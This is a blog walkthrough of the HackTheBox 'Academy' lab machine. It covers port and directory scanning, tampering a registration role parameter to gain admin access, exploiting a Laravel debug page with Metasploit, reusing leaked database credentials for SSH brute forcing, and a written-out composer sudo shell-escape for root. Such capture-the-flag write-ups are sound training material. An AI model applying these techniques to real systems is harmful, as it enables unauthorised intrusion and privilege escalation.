Blog Write-ups Contact

HTB Academy

Writeup for Academy box on HackTheBox.eu

Initial enumeration

Inital port scan

sudo nmap -sC -sV -vv -oA tcp 10.129.80.186 && sudo nmap -sC -sV -vv -oA allports -p- 10.129.80.186

Nmap Scan

When we browse to the IP we get redirected to academy.htb so let's add that to our hosts file.

Once there we are presented with a login / register link.

Creating an account with test/test allows us to login and see a panel of data.

Proxying our traffic through burp shows us that the application is contacting a /api/modules path, this looks intresting.

Burp Traffic proxy

The api paths are 404-ing so moving on.

Running ffuf on the main application

ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://academy.htb/FUZZ -c -e .php,.txt,.zip

FFUF

Checking the original register request, we notice that we are seding in a roleid=0 Change the role to 1 and see what happens

uid=test1&password=test&confirm=test&roleid=1

After we create a new account and try to login to the admin.php page we get some more information: Admin page

We discover a new subdomain so we add it to our hosts file

dev-staging-01.academy.htb

While accesing the website on this subdomain we discover it's a Laravel framework application but showing an error page, this tells us it's also in debug mode

laravel debug page

Trying to connect to MySQL on port 33060 fails without an error.

Initial foothold

There is an metasploit exploit for laravel

Metasploit usage

Browsing to the /var/www/html/academy folder we discover this is also a laravel app and we get a set of credentials for mysql

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

Using the password from mysql we try and login with the users found in /home/

21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n

We get a hit

Hydra ssh bruteforce

User enumeration

Our user is in the adm group and we have permissions to read some log files, let's see what we can find.

We can read auth and audit logs.

Let's run linpeas to see if it can find something interesting for us: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

And we get something interesting

LinPeas Output

Credentials: mrb3n / mrb3n_Ac@d3my!

After ssh-ing in as mrb3n and testing sudo -l we seem to be able to execute composer as sudo

MrBean SSH SUDO l

Privilege escalation

Looking a https://gtfobins.github.io/gtfobins/composer/#sudo we can actually execute a bash command while running composer

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Privilege Escalation